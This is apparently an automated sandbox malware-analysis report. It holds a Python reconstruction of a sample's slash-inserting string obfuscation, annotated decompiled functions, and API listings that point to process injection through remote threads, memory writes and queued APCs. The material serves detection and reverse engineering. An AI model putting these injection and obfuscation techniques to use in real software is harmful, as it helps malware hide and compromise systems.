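        state = lcg_step(state)                      # advance the global PRNG
        chunk = MIN_CHUNK + (state & 0xFFFF) % (ceiling - MIN_CHUNK)
        out.append(s[pos:pos + chunk])               # memcpy of the chunk
        out.append("/")                              # *_t27 = 0x2f
        pos += chunk
        remaining -= chunk
        if remaining <= MIN_CHUNK:                   # while (_t38 > 8)
            break
    out.append(s[pos:])                              # final memcpy: tail of 1..8 chars
    return "".join(out), state


def slash_join(obfuscated: str) -> str:
    """Undo the transform (only valid when the original contained no '/')."""
    return obfuscated.replace("/", "")


if __name__ == "__main__":
    sample = "0123456789" * 4                        # constructed 40-character input
    result, state = slash_split(sample, seed=0)
    print(result, hex(state))
```

With seed 0 the first generator output is 0x3C6EF35F, so the first chunk is 8 + (0xF35F % 16) = 23 characters; the second output is 0x47502932, giving 8 + (0x2932 % 9) = 15, after which two characters remain and the loop stops. Every separator-delimited part except the last is therefore 8..23 characters long and the last is 1..8, which is a usable structural check when hunting for this transform in captured data.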

                                                        C-Code - Quality: 50%
			E01204013(void** __esi) {
				intOrPtr _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				intOrPtr _t10;
				void* _t11;
				void** _t13;

				_t13 = __esi; // record whose pointer slots are updated under the global lock
				_t4 =  *0x120a37c; // 0x5769630 -- global state block
				__imp__(_t4 + 0x40); // RtlEnterCriticalSection (see APIs below) on the lock at +0x40
				while(1) {
					_t6 =  *0x120a37c; // 0x5769630
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) { // spin in 10 ms steps until the busy flag at +0x58 clears
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t13;
				if(_t8 != 0 && _t8 != 0x120a030) { // free the old pointer in slot 0 unless it is the built-in default inside the image
					HeapFree( *0x120a290, 0, _t8);
				}
				_t13[1] = E012038DA(_v0, _t13); // store the replacement derived from the caller's argument in slot 1
				_t10 =  *0x120a37c; // 0x5769630
				_t11 = _t10 + 0x40;
				__imp__(_t11); // RtlLeaveCriticalSection
				return _t11;
			}

Instruction addresses (report address column, in listing order): 0x01204013 0x01204013 0x0120401c 0x0120402c 0x0120402c 0x01204031 0x01204036 0x00000000 0x00000000 0x01204026 0x01204026 0x01204038 0x0120403c 0x0120404e 0x0120404e 0x0120405e 0x01204061 0x01204066 0x0120406a 0x01204070

                                                        APIs
                                                        • RtlEnterCriticalSection.NTDLL(057695F0), ref: 0120401C
                                                        • Sleep.KERNEL32(0000000A,?,?,01204540,?,?,?,?,?,012068F7,?,00000001), ref: 01204026
                                                        • HeapFree.KERNEL32(00000000,00000000,?,?,01204540,?,?,?,?,?,012068F7,?,00000001), ref: 0120404E
                                                        • RtlLeaveCriticalSection.NTDLL(057695F0), ref: 0120406A
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
• Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp
• Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp
• Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp
• Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp
                                                        Similarity
                                                        • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                        • String ID:
                                                        • API String ID: 58946197-0
                                                        • Opcode ID: b83dbecf91c4be09e987e6a588e543626341daa4ef064043ac653136aef9ec4d
                                                        • Instruction ID: 5adf4086774ebab34962beb87fc48a3cdfdaf2f6ad3151db7af9abce025d9f77
                                                        • Opcode Fuzzy Hash: b83dbecf91c4be09e987e6a588e543626341daa4ef064043ac653136aef9ec4d
                                                        • Instruction Fuzzy Hash: 08F05E30210281DFEB37EB28F84CB1A3BA6EF04344B008200F75AD72E7C220D884CB20
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
			E0120566B() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x120a2c4; // 0x2ec -- global event handle
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1); // signal the worker threads to stop
				_t11 = 0x7fffffff; // wait budget in ms (about 24.8 days, effectively unbounded)
				while(1) {
					SleepEx(0x64, 1); // alertable 100 ms sleep, so queued APCs still run during shutdown
					_t5 =  *0x120a308; // 0x0 -- cleared once the workers have exited
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x120a2c4; // 0x2ec
				if(_t6 != 0) {
					CloseHandle(_t6); // release the stop event
				}
				_t7 =  *0x120a290; // 0x5370000
				if(_t7 != 0) {
					HeapDestroy(_t7); // tear down the private heap used by the other routines ( *0x120a290)
				}
				goto L8;
			}

Instruction addresses (report address column, in listing order): 0x0120566b 0x01205672 0x012056bc 0x012056be 0x012056be 0x01205676 0x0120567c 0x01205681 0x01205685 0x0120568b 0x01205692 0x00000000 0x00000000 0x01205694 0x01205699 0x00000000 0x00000000 0x00000000 0x01205699 0x0120569b 0x012056a3 0x012056a6 0x012056a6 0x012056ac 0x012056b3 0x012056b6 0x012056b6 0x00000000

                                                        APIs
                                                        • SetEvent.KERNEL32(000002EC,00000001,01206991), ref: 01205676
                                                        • SleepEx.KERNEL32(00000064,00000001), ref: 01205685
                                                        • CloseHandle.KERNEL32(000002EC), ref: 012056A6
                                                        • HeapDestroy.KERNEL32(05370000), ref: 012056B6
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
• Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp
• Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp
• Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp
• Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp
                                                        Similarity
                                                        • API ID: CloseDestroyEventHandleHeapSleep
                                                        • String ID:
                                                        • API String ID: 4109453060-0
                                                        • Opcode ID: 7bf2f07182a52fa382119b389ea64b0146c11882279d349acc3273e83cb5372f
                                                        • Instruction ID: 32e7e5157ab134ee4a6cf25959c04c22e3241332a6e07d8850c9872964b8247e
                                                        • Opcode Fuzzy Hash: 7bf2f07182a52fa382119b389ea64b0146c11882279d349acc3273e83cb5372f
                                                        • Instruction Fuzzy Hash: 32F098B1B113229FFB32AA79BD4CB5B3BA9AB04A517450714BE09D71CBDA25D8808F50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 37%
			E0120152E() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x120a37c; // 0x5769630 -- global state block
				__imp__( &(_t3[0x10])); // RtlEnterCriticalSection on the lock at +0x40 (same lock as E01204013)
				while(1) {
					_t5 =  *0x120a37c; // 0x5769630
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) { // spin in 10 ms steps until the busy flag at +0x58 clears
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x120a37c; // 0x5769630
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x120b85e) { // free the old value in slot 0 unless it is the built-in default inside the image
					HeapFree( *0x120a290, 0, _t10);
					_t7 =  *0x120a37c; // 0x5769630
				}
				 *_t7 = _v0; // install the caller-supplied replacement
				_t8 =  &(_t7[0x10]);
				__imp__(_t8); // RtlLeaveCriticalSection
				return _t8;
			}

Instruction addresses (report address column, in listing order): 0x0120152e 0x01201537 0x01201547 0x01201547 0x0120154c 0x01201551 0x00000000 0x00000000 0x01201541 0x01201541 0x01201553 0x01201558 0x0120155c 0x0120156f 0x01201575 0x01201575 0x0120157e 0x01201580 0x01201584 0x0120158a

                                                        APIs
                                                        • RtlEnterCriticalSection.NTDLL(057695F0), ref: 01201537
                                                        • Sleep.KERNEL32(0000000A,?,?,01204540,?,?,?,?,?,012068F7,?,00000001), ref: 01201541
                                                        • HeapFree.KERNEL32(00000000,?,?,?,01204540,?,?,?,?,?,012068F7,?,00000001), ref: 0120156F
                                                        • RtlLeaveCriticalSection.NTDLL(057695F0), ref: 01201584
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
• Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp
• Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp
• Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp
• Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp
                                                        Similarity
                                                        • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                        • String ID:
                                                        • API String ID: 58946197-0
                                                        • Opcode ID: 736dcfda0d76a812a105d6ebfab06613246976eb55754e83d5a93bbdea6cb0cb
                                                        • Instruction ID: a631ad9d058d2349c9ee89eb3433247c056615f943390c713da161f93f179877
                                                        • Opcode Fuzzy Hash: 736dcfda0d76a812a105d6ebfab06613246976eb55754e83d5a93bbdea6cb0cb
                                                        • Instruction Fuzzy Hash: E2F0D074610201DFEB37CB24F84DB193BA6BB44705B484315E9479B397C771D850CB11
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 58%
			E012042AE(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx); // apparently lstrlen(_a4); the import name is not resolved in this listing
				_t2 = _t17 + 1; // 0x1 -- length including the terminator
				_t28 = _t2;
				_t34 = E01205FBC(_t2); // first buffer of that size (E01205FBC: allocation helper, inferred from its use)
				if(_t34 != 0) {
					_t30 = E01205FBC(_t28); // second buffer of the same size
					if(_t30 == 0) {
						E012013CC(_t34); // release the first buffer on failure (E012013CC: release helper, inferred from its use)
					} else {
						_t39 = _a4;
						_t22 = E01207838(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
                                                        						} else {
                                                        							_t26 = _t22 + 2;
                                                        							_a4 = _t22 + 2;
                                                        							_t22 = E01207838(_t26);
                                                        							_v8 = _t22;
                                                        						}
                                                        						if(_t22 == 0) {
                                                        							__imp__(_t34, _a4);
                                                        							 *_t30 = 0x2f;
                                                        							 *((char*)(_t30 + 1)) = 0;
                                                        						} else {
                                                        							_t42 = _t22 - _a4;
                                                        							memcpy(_t34, _a4, _t42);
                                                        							 *((char*)(_t34 + _t42)) = 0;
                                                        							__imp__(_t30, _v8);
                                                        						}
                                                        						 *_a8 = _t34;
                                                        						_t37 = 1;
                                                        						 *_a12 = _t30;
                                                        					}
                                                        				}
                                                        				return _t37;
                                                        			}

                                                        Instruction addresses (one per decompiled statement, in listing order): 0x012042ae, 0x012042b8, 0x012042ba, 0x012042c0, 0x012042c0, 0x012042c9, 0x012042cd, 0x012042d9, 0x012042dd, 0x01204351, 0x012042df, 0x012042df, 0x012042e3, 0x012042ea, 0x012042ed, 0x01204307, 0x012042f6, 0x012042f6, 0x012042fa, 0x012042fd, 0x01204302, 0x01204302, 0x0120430c, 0x01204334, 0x0120433a, 0x0120433d, 0x0120430e, 0x01204310, 0x01204318, 0x01204323, 0x01204328, 0x01204328, 0x01204344, 0x0120434b, 0x0120434c, 0x0120434c, 0x012042dd, 0x0120435c

                                                        APIs
                                                        • lstrlen.KERNEL32(00000000,0000EA60,?,00000008,?,?,01201314,00000000,00000000,00000000,05769698,?,?,012030D3,?,05769698), ref: 012042BA
                                                          • Part of subcall function 01205FBC: RtlAllocateHeap.NTDLL(00000000,00000000,01202035), ref: 01205FC8
                                                          • Part of subcall function 01207838: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,012042E8,00000000,00000001,00000001,?,?,01201314,00000000,00000000,00000000,05769698), ref: 01207846
                                                          • Part of subcall function 01207838: StrChrA.SHLWAPI(?,0000003F,?,?,01201314,00000000,00000000,00000000,05769698,?,?,012030D3,?,05769698,0000EA60,?), ref: 01207850
                                                        • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,01201314,00000000,00000000,00000000,05769698,?,?,012030D3), ref: 01204318
                                                        • lstrcpy.KERNEL32(00000000,00000000), ref: 01204328
                                                        • lstrcpy.KERNEL32(00000000,00000000), ref: 01204334
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp
                                                        Similarity
                                                        • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                                        • String ID:
                                                        • API String ID: 3767559652-0
                                                        • Opcode ID: b596d503c671b8ebad72fade4e1489b2410627158f28b44282b51e60ca431253
                                                        • Instruction ID: 84b70c5651f9413e577336e1d68cc10cfeabe3571c1f8c0f46575281905c66e1
                                                        • Opcode Fuzzy Hash: b596d503c671b8ebad72fade4e1489b2410627158f28b44282b51e60ca431253
                                                        • Instruction Fuzzy Hash: 9621E772410256EBCF13AF68C888AAFBFB8DF16284B149254FB099B243D731D940C7E0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			E01201370(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                                        				void* _v8;
                                                        				void* _t18;
                                                        				int _t25;
                                                        				int _t29;
                                                        				int _t34;
                                                        
                                                        				_t29 = lstrlenW(_a4);
                                                        				_t25 = lstrlenW(_a8);
                                                        				_t18 = E01205FBC(_t25 + _t29 + _t25 + _t29 + 2);
                                                        				_v8 = _t18;
                                                        				if(_t18 != 0) {
                                                        					_t34 = _t29 + _t29;
                                                        					memcpy(_t18, _a4, _t34);
                                                        					_t10 = _t25 + 2; // 0x2
                                                        					memcpy(_v8 + _t34, _a8, _t25 + _t10);
                                                        				}
                                                        				return _v8;
                                                        			}

                                                        Instruction addresses (one per decompiled statement, in listing order): 0x01201385, 0x01201389, 0x01201393, 0x0120139a, 0x0120139d, 0x0120139f, 0x012013a7, 0x012013ac, 0x012013ba, 0x012013bf, 0x012013c9

                                                        APIs
                                                        • lstrlenW.KERNEL32(004F0053,?,74B05520,00000008,0576930C,?,012053B4,004F0053,0576930C,?,?,?,?,?,?,01205131), ref: 01201380
                                                        • lstrlenW.KERNEL32(012053B4,?,012053B4,004F0053,0576930C,?,?,?,?,?,?,01205131), ref: 01201387
                                                          • Part of subcall function 01205FBC: RtlAllocateHeap.NTDLL(00000000,00000000,01202035), ref: 01205FC8
                                                        • memcpy.NTDLL(00000000,004F0053,74B069A0,?,?,012053B4,004F0053,0576930C,?,?,?,?,?,?,01205131), ref: 012013A7
                                                        • memcpy.NTDLL(74B069A0,012053B4,00000002,00000000,004F0053,74B069A0,?,?,012053B4,004F0053,0576930C), ref: 012013BA
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp
                                                        Similarity
                                                        • API ID: lstrlenmemcpy$AllocateHeap
                                                        • String ID:
                                                        • API String ID: 2411391700-0
                                                        • Opcode ID: 72bdc45ad08953833cff81b95175ac25df0499dea0984a8d764dad331420722a
                                                        • Instruction ID: c3fe8533d998b4c5e0611fd88e305644d79e986902ea919d31fe8e2561789d00
                                                        • Opcode Fuzzy Hash: 72bdc45ad08953833cff81b95175ac25df0499dea0984a8d764dad331420722a
                                                        • Instruction Fuzzy Hash: C2F04F36900119FBDF11DFA8CC88C9FBBACEF092547014166EA08D7102E731EA149BA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • lstrlen.KERNEL32(0576887A,00000000,00000000,00000000,01204AC6,00000000), ref: 01205C9D
                                                        • lstrlen.KERNEL32(?), ref: 01205CA5
                                                          • Part of subcall function 01205FBC: RtlAllocateHeap.NTDLL(00000000,00000000,01202035), ref: 01205FC8
                                                        • lstrcpy.KERNEL32(00000000,0576887A), ref: 01205CB9
                                                        • lstrcat.KERNEL32(00000000,?), ref: 01205CC4
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp
                                                        Similarity
                                                        • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                                        • String ID:
                                                        • API String ID: 74227042-0
                                                        • Opcode ID: f38cb67c61658852c11506e5da4d053bd4a71945ec84db6ad7bce5a6f07216d1
                                                        • Instruction ID: 8dc68b1775bdff1eaa3989ebec3e2b5dd4e78bcd9dd23c043e37f91d37279db8
                                                        • Opcode Fuzzy Hash: f38cb67c61658852c11506e5da4d053bd4a71945ec84db6ad7bce5a6f07216d1
                                                        • Instruction Fuzzy Hash: 37E01273501625A78B239BE8AC4CCAFBBADFF99655304061AF605D3216C7649805CBE1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Executed Functions

                                                        Memory Dump Source
                                                        • Source File: 00000026.00000003.649969924.00000131FEDA0000.00000010.00000001.sdmp, Offset: 00000131FEDA0000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                        • Instruction ID: 9fb1ed28ac7d61b781141f2856b4a72ffe1a3665778606b8829bb1ac2b4c8b60
                                                        • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                        • Instruction Fuzzy Hash: 619004154D540775D41411D10C453DD504577CCF54FD444C0441FF0545D44D03DF11F3
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000026.00000003.649969924.00000131FEDA0000.00000010.00000001.sdmp, Offset: 00000131FEDA0000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                        • Instruction ID: 9fb1ed28ac7d61b781141f2856b4a72ffe1a3665778606b8829bb1ac2b4c8b60
                                                        • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                        • Instruction Fuzzy Hash: 619004154D540775D41411D10C453DD504577CCF54FD444C0441FF0545D44D03DF11F3
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        Executed Functions

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000027.00000002.678335130.0000019D8B7B0000.00000040.00000001.sdmp, Offset: 0000019D8B7B0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @
                                                        • API String ID: 0-2766056989
                                                        • Opcode ID: 9e26852af833edec412c0de11438924e430ff278851e67a344344114f521d1d2
                                                        • Instruction ID: 57ac6b72fa8653b554d3fd25ac9e4b13dcd46c4f66ebdc11e8d7aa88581414af
                                                        • Opcode Fuzzy Hash: 9e26852af833edec412c0de11438924e430ff278851e67a344344114f521d1d2
                                                        • Instruction Fuzzy Hash: 7C226334618B09AFE7A9DF18E8A5BF673E1FB58300F44452DE45AC3296DF38E8458781
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000027.00000002.678335130.0000019D8B7B0000.00000040.00000001.sdmp, Offset: 0000019D8B7B0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: InformationQueryToken
                                                        • String ID: 0
                                                        • API String ID: 4239771691-4108050209
                                                        • Opcode ID: b00bdbe5e76e8574fbf38c79017efbcac25b001069e063d358994e26018d4f43
                                                        • Instruction ID: c2c493bb98736f9b833049788e11726fa452f77d103b98df6a2b90345610379e
                                                        • Opcode Fuzzy Hash: b00bdbe5e76e8574fbf38c79017efbcac25b001069e063d358994e26018d4f43
                                                        • Instruction Fuzzy Hash: 15411934218B898FD764EF19D894BAAB7E2FB98301F54493DE48AC3255CB389945CB42
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000027.00000002.678335130.0000019D8B7B0000.00000040.00000001.sdmp, Offset: 0000019D8B7B0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateInformationProcessRemoteThread
                                                        • String ID:
                                                        • API String ID: 3020566308-0
                                                        • Opcode ID: fbb9c8f312b893b60839ba48e8bc4ddd40b20ddac33ad9c4b23783b4827f991b
                                                        • Instruction ID: c81e37d4605f9f03267ce6bd696e02842d76961ad5e59a9766bff01c75aaa68f
                                                        • Opcode Fuzzy Hash: fbb9c8f312b893b60839ba48e8bc4ddd40b20ddac33ad9c4b23783b4827f991b
                                                        • Instruction Fuzzy Hash: 9251B53460CB058FE764EF28E8997AA77E1FB98341F04452DE94AC3296DF38D8498741
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000027.00000002.678335130.0000019D8B7B0000.00000040.00000001.sdmp, Offset: 0000019D8B7B0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Section$CreateView
                                                        • String ID: 0
                                                        • API String ID: 1585966358-4108050209
                                                        • Opcode ID: 40bb1598f9154bb559e81318fc058f53894861c0a25be57b6af6ff67e1b9a0e8
                                                        • Instruction ID: 1d4c31c254ac8f7c6fc19044736aab98ebd699fe8177e6bf553e1e83894e103c
                                                        • Opcode Fuzzy Hash: 40bb1598f9154bb559e81318fc058f53894861c0a25be57b6af6ff67e1b9a0e8
                                                        • Instruction Fuzzy Hash: F471C870618F099FEB54EF18E8D97A573E1FBA8301F10456ED84AC7256DB38E941CB82
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000027.00000002.678335130.0000019D8B7B0000.00000040.00000001.sdmp, Offset: 0000019D8B7B0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Create$MutexQueueThreadUser
                                                        • String ID:
                                                        • API String ID: 1097034428-0
                                                        • Opcode ID: bd03c217eebf3514f0dc141ef06a426e4807aa03d6b913fdaf265373ad3cc355
                                                        • Instruction ID: 219e155699776f4d648673060e4def4a9332576d075eb2a8aab4c04de595d309
                                                        • Opcode Fuzzy Hash: bd03c217eebf3514f0dc141ef06a426e4807aa03d6b913fdaf265373ad3cc355
                                                        • Instruction Fuzzy Hash: 9F72E874618B088FE758EF68FC956A977E1F758340F14452ED44BC32A6DE38D84ACB82
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000027.00000002.678335130.0000019D8B7B0000.00000040.00000001.sdmp, Offset: 0000019D8B7B0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateHeap
                                                        • String ID:
                                                        • API String ID: 10892065-0
                                                        • Opcode ID: b79121b0bf9300899778867a254ee6e6f699830a218d847d70ca451a66ee4414
                                                        • Instruction ID: 68142382f695358de94b27306701b6e2fc9748291360039b5950a70b0690ff0a
                                                        • Opcode Fuzzy Hash: b79121b0bf9300899778867a254ee6e6f699830a218d847d70ca451a66ee4414
                                                        • Instruction Fuzzy Hash: F491B534608F098FF758EF28EC597AA33E5FB94355F04452EE54AC3296EE78D8068B41
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000027.00000002.678335130.0000019D8B7B0000.00000040.00000001.sdmp, Offset: 0000019D8B7B0000, based on PE: false
                                                        Yara matches
                                                        Similarity
                                                        • API ID: InformationProcessQuery
                                                        • String ID:
                                                        • API String ID: 1778838933-0
                                                        • Opcode ID: 1a5ec96146b37ae29432bfa8ac23ac72cbb7241fa644212a0b5fd835a5577e33
                                                        • Instruction ID: 0edb75e6b1fa63adf8f4db4979da0df8ca0b11e5bc8ff85b5bd2594ed02f6e21
                                                        • Opcode Fuzzy Hash: 1a5ec96146b37ae29432bfa8ac23ac72cbb7241fa644212a0b5fd835a5577e33
                                                        • Instruction Fuzzy Hash: 9C018F30214B08AFEB94DF68DCE4AB573E1FBA8305F50046EE859D3194D728E842C701
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
Function: SectionView
• Memory Dump Source: 00000027.00000002.678335130.0000019D8B7B0000.00000040.00000001.sdmp, Offset: 0000019D8B7B0000, based on PE: false
• API ID: SectionView
• String ID:
• API String ID: 1323581903-0
• Opcode ID (Opcode Fuzzy Hash): fcd82b1f9bd2768ab02ed58a59795749d2e6ecb94e6dd7f1d9f4b656cf451d04
• Instruction ID: 62a10afa50424e0b4a48582b6987fdcd61bff00ee31dd7ac864bc9f88cae8a31
• Instruction Fuzzy Hash: CD01C0B0A08B048FCB48EF69E4C8569BBE1FB58311B10066FE949CB796DB70D885CB45
• Uniqueness Score: -1.00%

Function: MemoryVirtualWrite
• Memory Dump Source: 00000027.00000002.678335130.0000019D8B7B0000.00000040.00000001.sdmp, Offset: 0000019D8B7B0000, based on PE: false
• API ID: MemoryVirtualWrite
• String ID:
• API String ID: 3527976591-0
• Opcode ID (Opcode Fuzzy Hash): 3c8ab56f3603755e988b26635f94d5e2d310067f79c5e42d2b82552f2c8fabb7
• Instruction ID: 8843a922d4b1f0e5a58fd54ee443cb8a8f91352a5ac34e872cd1391fd4d4d7e3
• Instruction Fuzzy Hash: 6AE09278B14B855FE7005BB49CD83B973E0FB48301F10083DE885C76A1C62DC8404382
• Uniqueness Score: -1.00%

Function: CreateValue (with string reference)
• Memory Dump Source: 00000027.00000002.678335130.0000019D8B7B0000.00000040.00000001.sdmp, Offset: 0000019D8B7B0000, based on PE: false
• API ID: CreateValue
• String ID: ($(
• API String ID: 2259555733-222463766
• Opcode ID (Opcode Fuzzy Hash): 15c0657e6459d840dfd1ed2d718bab6897b6f36c0ec807a258d29cf25e484d4a
• Instruction ID: 706885eff1800ddfc2296d7cd60ad7537d5098d726a312dee3d6e07039b39fc7
• Instruction Fuzzy Hash: 92319234618B089FF764DF18EC697AAB7E5FB98305F10051DE449C32A2EB7C9946C705
• Uniqueness Score: -1.00%

Function: File$CreatePointerRead
• Memory Dump Source: 00000027.00000002.678335130.0000019D8B7B0000.00000040.00000001.sdmp, Offset: 0000019D8B7B0000, based on PE: false
• API ID: File$CreatePointerRead
• String ID:
• API String ID: 2103328899-0
• Opcode ID (Opcode Fuzzy Hash): 71d59c8fd03c1f47d27e273b6030a364b82ed69c839053eddebff289bcd6d591
• Instruction ID: d4a47114a9d9329f9fc67abab6a53869376ced2afd3d0a0be3a19b98bf70b137
• Instruction Fuzzy Hash: B741D53021CB084FDB58DF28ECD866973E1F788314F25466EE19AC7296DB79D846C781
• Uniqueness Score: -1.00%

Function: Thread$ResumeSuspend
• Memory Dump Source: 00000027.00000002.678335130.0000019D8B7B0000.00000040.00000001.sdmp, Offset: 0000019D8B7B0000, based on PE: false
• API ID: Thread$ResumeSuspend
• String ID:
• API String ID: 3472746266-0
• Opcode ID (Opcode Fuzzy Hash): ffbd531617e9de6398172a96c7478380edc2f1a6ff7c6ff8001d704803e1d92c
• Instruction ID: b8970602e30a35b81f9838b88f9614805a95ba45ceb71aec2a74b8049cdefc53
• Instruction Fuzzy Hash: A9718F3461CB085BE7A8EB18E8657FA73D1FB98301F10452DE58AC3193DF38D9458B46
• Uniqueness Score: -1.00%

Function: CreateQueueThreadUser
• Memory Dump Source: 00000027.00000002.678335130.0000019D8B7B0000.00000040.00000001.sdmp, Offset: 0000019D8B7B0000, based on PE: false
• API ID: CreateQueueThreadUser
• String ID:
• API String ID: 3600083758-0
• Opcode ID (Opcode Fuzzy Hash): 36f65ecab13cfc995b4b55937e947feb4e6208ee9d24dec18057a5403e22070c
• Instruction ID: e39242f51eb2604db16f5699adc8397c549f2346df5b6cf2a4e567d69475506f
• Instruction Fuzzy Hash: B9012930714A094FEBA4EF6DA84D63976F2EB98351B25457AE409C3270DE78DC428B81
• Uniqueness Score: -1.00%

Function: ContinueHandlerVectored
• Memory Dump Source: 00000027.00000002.678335130.0000019D8B7B0000.00000040.00000001.sdmp, Offset: 0000019D8B7B0000, based on PE: false
• API ID: ContinueHandlerVectored
• String ID:
• API String ID: 3758255415-0
• Opcode ID (Opcode Fuzzy Hash): 5cfdce6ba604bbcc091d7b921d4918bbcddbfb62c8266db36f703a1fb59b6e8d
